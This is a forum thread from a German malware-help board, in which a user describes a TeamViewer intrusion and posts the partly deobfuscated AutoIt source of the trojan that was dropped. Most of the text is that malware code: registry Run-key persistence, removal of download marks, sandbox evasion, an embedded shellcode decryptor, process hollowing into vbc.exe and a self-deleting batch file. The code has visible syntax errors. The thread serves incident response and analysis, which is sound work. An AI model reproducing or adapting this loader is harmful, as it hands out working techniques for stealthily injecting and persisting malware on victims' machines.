Trojaner-Board (https://www.trojaner-board.de/)
-   Pests of all kinds and how to fight them (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Confirmed virus - analysis/cleanup of the Trojan/keylogger incl. original file (https://www.trojaner-board.de/169461-bestaetigter-virus-analyse-saeuberung-trojaner-keylogger-inkl-ursprungsdatei.html)

FabulousGee 08.08.2015 18:33

Confirmed virus - analysis/cleanup of the Trojan/keylogger incl. original file
 
Hello dear board,

Until now I thought I had secured my system very well - but unfortunately I missed a gap...

Short background:
We have a group of several computers that are partly configured for unattended access via TeamViewer. That is, you can connect from one computer to another without a password if you know the master password.

About 30 minutes ago I (luckily) happened to be sitting at my computer when an incoming connection was suddenly initiated - under my own name?! With presence of mind I immediately closed the file transfer server that was just opening, disconnected the connection and changed all passwords straight away.
As far as I have investigated so far, the file could not be transferred, let alone executed. No data was stolen either.

Unfortunately another computer in the group was not so lucky. It was definitely infected.
Data was stolen (what exactly is still unclear, my guess is passwords and the like) and malware was definitely installed. I also uploaded the file to VirusTotal:
https://www.virustotal.com/de/file/b2b0f3a0941d65590c035c8ecc69f9ef20284a3a9fda08e661ac4e99840db33b/analysis/1439053104/

I still have this original file here. I didn't want to upload it here for now because I don't know whether that would be ok. But of course I would gladly make it available to an analyst so that it can be determined exactly which data was stolen.

Of course I shut down the affected computer immediately - unfortunately it keeps restarting itself automatically, so I now have to cut the internet connection. Physically :headbang:
Would be nice if someone has an idea. In the meantime I will try to test the whole thing in a VM.


P.S.: By the way, the TeamViewer ID of this scumbag is 302087758 - maybe a greyhat would like to take a closer look at what else is going on there... As soon as the TV hotline is reachable again I will demand the release of the data there and see whether a police report can achieve something. Unfortunately the cybercrime department of the criminal investigation standby service is not staffed at weekends; they put me off until Monday.

schrauber 08.08.2015 20:24

Hi,

Send the file to schrauber(at)trojaner-board.de

FabulousGee 09.08.2015 02:50

Sent it to you as an archive.

By now I assume that no professional was at work here. The attack apparently ran manually, and the way of copying the files via TeamViewer also seems semi-professional.
Apparently only basic data was stolen at first (although a specialist needs to look into that more closely; I only have rudimentary knowledge).
Besides, the virus/Trojan was apparently developed with AutoIt - not necessarily the first choice for professionals. It's more something for the script kiddie faction :kloppen:

Oh, and by the way, the infected operating system is Windows Server 2012 - mine at home is Windows 10. Mine here at home didn't get hit; I have since checked it again with the well-known tools from here.

The AutoIt code is pretty heavily obfuscated. Here is my current state, maybe someone can already read something out of it... (There are some errors in it and the code shouldn't compile, so it's useless for script kiddies and the like ;) )

I think I can only continue tomorrow - my eyes won't cooperate anymore.

Code:

#NoTrayIcon
If FileExists($CmdLine[1] & ':' & 'Zone.Identifier') Then DllCall('kernel32.dll', 'bool', 'DeleteFileW', 'wstr', $CmdLine[1] & ':' & 'Zone.Identifier')
FileSetAttrib($CmdLine[1], "+" & "SH")
RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cmd", "REG_SZ", $CmdLine[1])

$incl2Content = FileRead(@TempDir & "\incl2")
Local $byte =        "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001" & _
                                "000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F09203" & _
                                "45100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF4" & _
                                "86843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025" & _
                                "FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5" & _
                                "ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B7508" & _
                                "01D6300642EB985F5E5BC9C21000"
Local $dllStruct = DllStructCreate("byte[" & BinaryLen($byte) & "]")
Local $dllStruct2 = DllStructCreate("byte[" & BinaryLen($incl2Content) & "]")
DllStructSetData($dllStruct, 1, $byte)
DllStructSetData($dllStruct2, 1, $incl2Content)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($dllStruct), "ptr", DllStructGetPtr($dllStruct2), "int", BinaryLen($incl2Content), "str", "cKDYReZyuWfy61QulAryNR7EYMaDbe", "int", 0)

$U33STO = DllStructGetData($dllStruct2, 1)
$Z35UEB7lP = X34UeeV($U33STO, D33388gcMC(), "")
While 1
If Not ProcessExists($Z35UEB7lP) Then
$Z35UEB7lP = X34UeeV($U33STO, D33388gcMC(), "")
Endif
RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cmd", "REG_SZ", $CmdLine[1])
Sleep(100)
WEnd
Func checkForSandbox()
        If ProcessExists("SandboxieRpcSs.exe") OR ProcessExists("SandboxieDcomLaunch.exe") Then
                Exit
        EndIf
EndFunc
Global $M3131bk7 = ProcessList()
#region X34UeeV
Func X34UeeV($K3336CU, $J3337fv0 = $CmdLine[1], $Q3338up1RPa = "")
        Local $F3431gdkgk = DllStructCreate("byte[" & BinaryLen($K3336CU) & "]"), $32Or64Bit, $A3434Awlq, $T34357y4o, $P3436DDYOo, $T3437TG36, $M3438toP, $U3439RlPADx, $K3530gWa, $D3531XIR4i2, $X3532Zi, $N3533kyfrhm, $G35344C4, $Z3535ydppu
        DllStructSetData($F3431gdkgk, 1, $K3336CU)
        Local $R35384mv = DllStructGetPtr($F3431gdkgk), $S3630nhJ7kX = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")
        Local @CRLF = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $J3337fv0, "wstr", $Q3338up1RPa, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr(DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")), "ptr", DllStructGetPtr($S3630nhJ7kX))
        If @error Or Not @CRLF[0] Then Return 0
        Local $B3732rjO = DllStructGetData($S3630nhJ7kX, "Process"), $U3734zWbmn = DllStructGetData($S3630nhJ7kX, "Thread")
        If @AutoItX64 And E38zXvY13($B3732rjO) Then Return W3130CLmo($B3732rjO)
        If @AutoItX64 Then
                If @OSArch = "X64" Then
                        $32Or64Bit = 2
                        $A3434Awlq = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;dword ContextFlags; dword MxCsr;word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;uint64 Rip;uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];uint64 VectorRegister[52]; uint64 VectorControl;uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
                Else
                        Return W3130CLmo($B3732rjO)
                EndIf
        Else
                $32Or64Bit = 1
                $A3434Awlq = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")
        EndIf
        Switch $32Or64Bit
                Case 1
                        $T34357y4o = 0x10007
                Case 2
                        $T34357y4o = 0x100007
        EndSwitch
        DllStructSetData($A3434Awlq, "ContextFlags", $T34357y4o)
        @CRLF = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $U3734zWbmn, "ptr", DllStructGetPtr($A3434Awlq))
        If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
        Switch $32Or64Bit
                Case 1
                        $P3436DDYOo = DllStructGetData($A3434Awlq, "Ebx")
                Case 2
                        $P3436DDYOo = DllStructGetData($A3434Awlq, "Rdx")
        EndSwitch
        Local $N3939Yf = DllStructCreate("char Magic[2];word BytesOnLastPage;word Pages;word Relocations;word SizeofHeader;word MinimumExtra;word MaximumExtra;word SS;word SP;word Checksum;word IP;word CS;word Relocation;word Overlay;char Reserved[8];word OEMIdentifier;word OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $R35384mv), $F313031vdTPLi = $R35384mv
        $R35384mv += DllStructGetData($N3939Yf, "AddressOfNewExeHeader")
        Local $V313035mI = DllStructGetData($N3939Yf, "Magic")
        If Not ($V313035mI == "MZ") Then Return W3130CLmo($B3732rjO)
        Local $X313039hiL = DllStructCreate("dword Signature", $R35384mv)
        $R35384mv += 4
        If DllStructGetData($X313039hiL, "Signature") <> 17744 Then Return W3130CLmo($B3732rjO)
        Local $S313134jWhG = DllStructCreate("word Machine;word NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;word SizeOfOptionalHeader;word Characteristics", $R35384mv), $S313136YFRM0t = DllStructGetData($S313134jWhG, "NumberOfSections")
        $R35384mv += 20
        Local $H313139A4s = DllStructCreate("word Magic;", $R35384mv), $R313231ae = DllStructGetData($H313139A4s, 1), $Y3132334lfa
        If $R313231ae = 267 Then
                If @AutoItX64 Then Return W3130CLmo($B3732rjO)
                $Y3132334lfa = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $R35384mv)
                $R35384mv += 96
        ElseIf $R313231ae = 523 Then
                If Not @AutoItX64 Then Return W3130CLmo($B3732rjO)
                $Y3132334lfa = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $R35384mv)
                $R35384mv += 112
        Else
                Return W3130CLmo($B3732rjO)
        EndIf
        Local $F313335JnK = DllStructGetData($Y3132334lfa, "AddressOfEntryPoint"), $W313337uhBVD2 = DllStructGetData($Y3132334lfa, "SizeOfHeaders"), $P3133392Uc = DllStructGetData($Y3132334lfa, "ImageBase"), $S313431C3 = DllStructGetData($Y3132334lfa, "SizeOfImage")
        $R35384mv += 40
        Local $K313434405HMa = DllStructCreate("dword a; dword b", $R35384mv), $A3134361vSa7a = DllStructGetData($K313434405HMa, "a"), $Y313438uYxU = DllStructGetData($K313434405HMa, "b")
        If $A3134361vSa7a And $Y313438uYxU Then $T3437TG36 = True
        $R35384mv += 88
        If $T3437TG36 Then
                $U3439RlPADx = N36sQg($B3732rjO, $S313431C3)
                If @error Then
                        $U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
                        If @error Then
                                I373b610($B3732rjO, $P3133392Uc)
                                $U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
                                If @error Then Return W3130CLmo($B3732rjO)
                        EndIf
                EndIf
                $M3438toP = True
        Else
                $U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
                If @error Then
                        I373b610($B3732rjO, $P3133392Uc)
                        $U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
                        If @error Then Return W3130CLmo($B3732rjO)
                EndIf
        EndIf
        DllStructSetData($Y3132334lfa, "ImageBase", $U3439RlPADx)
        Local $I313833pf = DllStructCreate("byte[" & $S313431C3 & "]"), $X313835uc = DllStructGetPtr($I313833pf), $I3138376izn = DllStructCreate("byte[" & $W313337uhBVD2 & "]", $F313031vdTPLi)
        DllStructSetData($I313833pf, 1, DllStructGetData($I3138376izn, 1))
        For $B3233Tv = 1 To $S313136YFRM0t
                $K3530gWa = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;word NumberOfLinenumbers;dword Characteristics", $R35384mv)
                $D3531XIR4i2 = DllStructGetData($K3530gWa, "SizeOfRawData")
                $X3532Zi = $F313031vdTPLi + DllStructGetData($K3530gWa, "PointerToRawData")
                $N3533kyfrhm = DllStructGetData($K3530gWa, "VirtualAddress")
                $G35344C4 = DllStructGetData($K3530gWa, "UnionOfVirtualSizeAndPhysicalAddress")
                If $G35344C4 And $G35344C4 < $D3531XIR4i2 Then $D3531XIR4i2 = $G35344C4
                If $D3531XIR4i2 Then
                        DllStructSetData(DllStructCreate("byte[" & $D3531XIR4i2 & "]", $X313835uc + $N3533kyfrhm), 1, DllStructGetData(DllStructCreate("byte[" & $D3531XIR4i2 & "]", $X3532Zi), 1))
                EndIf
                If $M3438toP Then
                        If $N3533kyfrhm <= $A3134361vSa7a And $N3533kyfrhm + $D3531XIR4i2 > $A3134361vSa7a Then
                                $Z3535ydppu = DllStructCreate("byte[" & $Y313438uYxU & "]", $X3532Zi + ($A3134361vSa7a - $N3533kyfrhm))
                        EndIf
                EndIf
                $R35384mv += 40
        Next
        If $M3438toP Then I391m4k($X313835uc, $Z3535ydppu, $U3439RlPADx, $P3133392Uc, $R313231ae = 523)
        @CRLF = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $B3732rjO, "ptr", $U3439RlPADx, "ptr", $X313835uc, "dword_ptr", $S313431C3, "dword_ptr*", 0)
        If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
        Local $S323433rXixP = DllStructCreate("byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId")
        @CRLF = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $B3732rjO, "ptr", $P3436DDYOo, "ptr", DllStructGetPtr($S323433rXixP), "dword_ptr", DllStructGetSize($S323433rXixP), "dword_ptr*", 0)
        If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
        DllStructSetData($S323433rXixP, "ImageBaseAddress", $U3439RlPADx)
        @CRLF = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $B3732rjO, "ptr", $P3436DDYOo, "ptr", DllStructGetPtr($S323433rXixP), "dword_ptr", DllStructGetSize($S323433rXixP), "dword_ptr*", 0)
        If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
        Switch $32Or64Bit
                Case 1
                        DllStructSetData($A3434Awlq, "Eax", $U3439RlPADx + $F313335JnK)
                Case 2
                        DllStructSetData($A3434Awlq, "Rcx", $U3439RlPADx + $F313335JnK)
        EndSwitch
        @CRLF = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $U3734zWbmn, "ptr", DllStructGetPtr($A3434Awlq))
        If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
        @CRLF = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $U3734zWbmn)
        If @error Or @CRLF[0] = -1 Then Return W3130CLmo($B3732rjO)
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $B3732rjO)
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $U3734zWbmn)
        Return DllStructGetData($S3630nhJ7kX, "ProcessId")
EndFunc
Func P35ppyQDA($B3732rjO, $Y323836f1Ej, $Q323837vv)
        Local @CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", $Y323836f1Ej, "dword_ptr", $Q323837vv, "dword", 0x1000, "dword", 64)
        If @error Or Not @CRLF[0] Then
                @CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", $Y323836f1Ej, "dword_ptr", $Q323837vv, "dword", 0x3000, "dword", 64)
                If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
        EndIf
        Return @CRLF[0]
EndFunc
Func N36sQg($B3732rjO, $Q323837vv)
        Local @CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", 0, "dword_ptr", $Q323837vv, "dword", 0x3000, "dword", 64)
        If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
        Return @CRLF[0]
EndFunc
Func I373b610($B3732rjO, $Y323836f1Ej)
        DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $B3732rjO, "ptr", $Y323836f1Ej)
        If @error Then Return SetError(1, 0, 0)
        Return 1
EndFunc
Func E38zXvY13($B3732rjO)
        Local @CRLF = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $B3732rjO, "bool*", 0)
        If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
        Return @CRLF[2]
EndFunc
Func I391m4k($X313835uc, $V3332354lR, $Q333236JBYCfB, $X333237sEGRT, $C333238IG0tSj)
        Local $W333239BuqR, $F333330aqmT, $M333331Q5jti, $D333332hY0i6p, $Y333333YxnZ, $F333334uTGp, $32Or64Bit = 3 + 7 * $C333238IG0tSj
        While $F333330aqmT < DllStructGetSize($V3332354lR)
                $W333239BuqR = DllStructCreate("dword a; dword b", DllStructGetPtr($V3332354lR) + $F333330aqmT)
                $M333331Q5jti = DllStructGetData($W333239BuqR, Chr(98))
                $Y333333YxnZ = DllStructCreate("word[" & (($M333331Q5jti - 8) / 2) & Chr(93), DllStructGetPtr($W333239BuqR) + 8)
                For $B3233Tv = 1 To (($M333331Q5jti - 8) / 2)
                        If BitShift(DllStructGetData($Y333333YxnZ, 1, $B3233Tv), 12) = $32Or64Bit Then
                                $F333334uTGp = DllStructCreate("ptr", $X313835uc + DllStructGetData($W333239BuqR, "a") + BitAND(DllStructGetData($Y333333YxnZ, 1, $B3233Tv), 0xFFF))
                                DllStructSetData($F333334uTGp, 1, DllStructGetData($F333334uTGp, 1) + $Q333236JBYCfB - $X333237sEGRT)
                        EndIf
                Next
                $F333330aqmT += $M333331Q5jti
        WEnd
        Return 1
EndFunc
Func W3130CLmo($P3336343w)
        DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $P3336343w, "dword", 0)
        Return 0
EndFunc
#endregion
Func isAttackableSystem()
        If (StringInStr(@OSVersion, "XP") AND StringInStr(@UserName, "Admin") AND StringInStr(@ComputerName, "pc") AND StringInStr(@OSServicePack, "3")) = True Then
                If $M3131bk7[18][0] = "msmsgs.exe" And $M3131bk7[19][0] = "reader_sl.exe" And $M3131bk7[20][0] = "alg.exe" And $M3131bk7[21][0] = "wscntfy.exe" Then Exit
        EndIf
EndFunc
Func W3234j1($fileName, $destination, $K343038oBz = false)
        Execute("FileCopy('" & $fileName & "', '" & $destination & "')")
        Execute('ShellExecute("' & $destination & '")')
        If $K343038oBz Then H3335yxY()
        Exit
EndFunc
Func X3330YX($V343139vzbQ, $fileName)
        Sleep(1000)
        Switch $V343139vzbQ
                Case "1"
                        If $CmdLine[1] <> "@AppDataDir" & "\" & $fileName Then
                                W3234j1($CmdLine[1], "@AppDataDir" & "\" & $fileName, true)
                        EndIf
                Case "2"
                        If $CmdLine[1] <> "@TempDir" & "\" & $fileName Then
                                W3234j1($CmdLine[1], "@TempDir" & "\" & $fileName, true)
                        EndIf
                Case "3"
                        If $CmdLine[1] <> "@AppDataDir" & "\" & $fileName Then
                                W3234j1($CmdLine[1], "@AppDataDir" & "\" & $fileName)
                        EndIf
                Case "4"
                        If $CmdLine[1] <> "@TempDir" & "\" & $fileName Then
                                W3234j1($CmdLine[1], "@TempDir" & "\" & $fileName)
                        EndIf
                EndSwitch
EndFunc
Func Q33327cE(@CRLF)
        Global $F3135YfH = FileFindFirstFile(StringRegExpReplace(@CRLF, "[\\/]+$", "") & "\*")
        Return $F3135YfH
EndFunc
Func hasDefaultBrowser()
        If RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice", "Progid") <> '' Then Return True
        Return False
EndFunc
Func H3335yxY()
        Local $newScript = @TempDir & "\" & Random(50, 100, 1) & ".bat"
    FileDelete($newScript)
    FileWrite($newScript, 'ping -n ' & 0 & '127.0.0.1 > nul' & @CRLF & ':loop' & @CRLF & 'del "' & @ScriptDir & "\" & @ScriptName & '"' & @CRLF & 'if exist "' & @ScriptDir & "\" & @ScriptName & '" goto loop' & @CRLF & 'del ' & $newScript)
    Run($newScript, @TempDir, @SW_HIDE)
EndFunc
Func J3336pLYk()
        If hasDefaultBrowser() Then Return StringLeft(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\shell\open\command", Null), 1), StringInStr(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\shell\open\command", Null), 1), '"') - 1)
        Return StringLeft(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\http\shell\open\command", Null), 1), StringInStr(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\http\shell\open\command", Null), 1), '"') - 1)
EndFunc
Func Z3337tF($S343634cMb, $R343635p8 = "*", $Z343636A4r = 0, $U3436377V5 = False)
        Local $G3436395v = ""
        Local $nextFile = ""
        Local $J343731fmlc = ""
        Local $S343634cMb = StringRegExpReplace($S343634cMb, "[\\/]+$", "") & "\"
        If $U3436377V5 Then $J343731fmlc = $S343634cMb
        If Not FileExists($S343634cMb) Then Return SetError(1, 0, 0)
        If StringRegExp($R343635p8, "[\\/:><\|]|(?s)^\s*$") Then Return SetError(2, 0, 0)
        If Not ($Z343636A4r = 0 Or $Z343636A4r = 1 Or $Z343636A4r = 2) Then Return SetError(3, 0, 0)
        Local $U343836Tjb = FileFindFirstFile($S343634cMb & $R343635p8)
        If @error Then Return SetError(4, 0, 0)
        While 1
                $nextFile = FileFindNextFile($U343836Tjb)
                If @error Then ExitLoop
                If ($Z343636A4r + @extended = 2) Then ContinueLoop
                $G3436395v &= "|" & $J343731fmlc & $nextFile
        WEnd
        FileClose($U343836Tjb)
        If $G3436395v = "" Then Return SetError(4, 0, 0)
        Return StringSplit(StringTrimLeft($G3436395v, 1), "|")
EndFunc
Func D33388gcMC()
    Local $Q353030p7 = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework", "InstallRoot")
    Local $K353031wO0 = Z3337tF($Q353030p7 , "*", 2), $U353033AT = ''
    For $B3233Tv = $K353031wO0[0] To 1 Step -1
        If StringRegExp($K353031wO0[$B3233Tv], "v4\.0\.\d+", 0) Then
            $U353033AT = $K353031wO0[$B3233Tv]
            ExitLoop
        ElseIf StringRegExp($K353031wO0[$B3233Tv], "v2\.0\.\d+", 0) Then
            $U353033AT = $K353031wO0[$B3233Tv]
            ExitLoop
        EndIf
    Next
        Return $Q353030p7 & $U353033AT & "\vbc.exe"
EndFunc

List of the heavily encrypted base commands:

Code:

1=dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError
2=ptr Process;ptr Thread;dword ProcessId;dword ThreadId
3=kernel32.dll
4=ntdll.dll
5=align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;dword ContextFlags; dword MxCsr;word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;uint64 Rip;uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];uint64 VectorRegister[52]; uint64 VectorControl;uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip
6=dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]
7=char Magic[2];word BytesOnLastPage;word Pages;word Relocations;word SizeofHeader;word MinimumExtra;word MaximumExtra;word SS;word SP;word Checksum;word IP;word CS;word Relocation;word Overlay;char Reserved[8];word OEMIdentifier;word OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader
8=word Machine;word NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;word SizeOfOptionalHeader;word Characteristics
9=word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes
